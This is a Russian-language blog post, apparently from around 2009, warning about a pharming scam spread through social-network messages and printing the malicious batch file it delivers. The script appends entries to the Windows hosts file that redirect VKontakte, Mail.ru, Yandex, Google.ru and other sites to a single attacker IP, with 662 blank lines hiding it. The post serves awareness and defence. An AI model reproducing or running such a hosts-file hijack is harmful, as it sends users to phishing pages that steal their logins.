Pull to refresh

Фарминг в соц. сетях

Information Security *
Похоже, началась очередная эпидемия фарминга через социальные сети.

В одной из известных популярных социальных сетей (а может, и не в одной?) через систему личных сообщений друзьям рассылаются сообщения вида:
У меня не рaбoтает фaйл один нужный, можешь прoверить у себя?

На что человек, конечно же, получает ответ:
Могу, привет)

И через некоторое время получает следующее сообщение:
urlshort.me** фaйл без oшибoк зaпускaеться?))

(адрес закрыл звёздочками специально, чтоб неповадно было щёлкать:)

Как человек, наученный жизненным опытом (в том числе и своим), сходил по ссылке браузером в режиме инкогнито. Сокращённая ссылка ведёт на один из популярных файлообменников, с которого предлагают скачать файл qip_unfium.bat

Ничего не подозревающий пользователь щёлкает по этому файлу, желая помочь другу разобраться с проблемой с Квипом Унфиумом, и… выполняется следующий код:
@rem ----- ExeScript Options Begin -----
@rem ScriptType: console
@rem DestDirectory: temp
@rem Icon: default
@rem ----- ExeScript Options End -----
@echo off
echo 81.94.229.115 www.mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.ya.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 ya.ru >> %windir%\system32\drivers\etc\hosts


Кстати перед собственно телом скрипта в файле 662 пустые строки.

О последствиях выполнения данного скрипта можно не упоминать.

Мораль? В стотысячный раз напоминаю: остерегайтесь подделок и уточняйте у друзей, а действительно ли они присылали вам такую ссылку.

UPD от 16 ноября 2009 года: Вторая часть Марлезонского балета. :-)
Tags:
Hubs:
Total votes 115: ↑81 and ↓34 +47
Views 2.1K
Comments 137
Comments Comments 137

Posts